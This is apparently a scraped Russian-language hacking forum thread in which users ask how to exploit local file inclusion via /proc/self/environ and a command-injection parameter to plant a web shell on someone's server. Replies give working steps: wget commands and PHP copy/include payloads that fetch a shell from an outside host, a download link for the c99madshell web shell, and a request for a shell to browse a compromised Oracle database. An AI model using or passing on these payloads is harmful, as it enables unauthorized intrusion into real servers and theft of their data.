The second option displaying "Madre e Hijo Nesk". The first option doesn't show anything

file=../../../../../proc/self/environ

выводит содержимое файла.

через Tamper записываю

пытаюсь подключить,

file=../../../../../proc/self/environ&e=e=phpinfo();

просто выводит водержимое.

Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

index.php?cmd=wget http://site.ru/shell.txt -O shell.php

люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

а какой командой мне загрузить шелл подскажите плиз

КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ

посмотри стоит ли wget: index.php?cmd=whereis wget

Если стоит, делай так:

wget http://address/shell.txt -O /path/to/shell/shell.php

з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так:

index.php?cmd=ls -la

передай в заголовке User-agent.

Сделай так:

1. index.php?cmd=phpinfo();

если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php

дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php

2. index.php?cmd=ls -la

если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл

шел скопируется в текущую диру, и потом просто открой sss.php

Соответственно сработает если хватит прав на запись.

http://madnet.name/files/download/9_c99madshell.php

p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.

Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?

Iz etogo topika nechego rabotyeshego vrode ne nashel /thread246807.html

Spasibo